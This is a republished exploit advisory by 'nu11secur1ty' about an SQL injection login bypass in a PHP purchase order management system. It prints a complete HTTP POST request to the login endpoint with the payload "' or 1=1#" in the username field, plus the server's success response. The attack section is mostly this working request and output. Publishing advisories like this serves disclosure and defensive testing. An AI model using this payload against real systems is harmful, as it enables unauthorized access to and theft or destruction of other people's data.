POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication
2024-11-11 13:10:59 Author: cxsecurity.com(查看原文) 阅读量:1 收藏

POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication

## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication ## Author: nu11secur1ty ## Date: 11/08/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `username` parameter is vulnerable to SQLi-bypass authentication. This will make it easy for malicious users to log in on this system, getting sensitive information, or even worse than ever, they can destroy it very easily! STATUS: HIGH- Vulnerability [+]Exploit: - SQLi: ```mysql POST /purchase_order/classes/Login.php?f=login HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0 Content-Length: 44 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/purchase_order/admin/login.php Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive username=nu11secur1ty' or 1=1#&password=sada ``` [+]Response: ``` HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 08:08:35 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 {"status":"success"} ``` ## Reproduce: [href](https://www.youtube.com/watch?v=wG60bjiFN7o) ## Demo PoC: [href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright.html) ## Time spent: 00:05:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2024, cxsecurity.com

Back to Top


文章来源: https://cxsecurity.com/issue/WLB-2024110015
如有侵权请联系:admin#unsafe.sh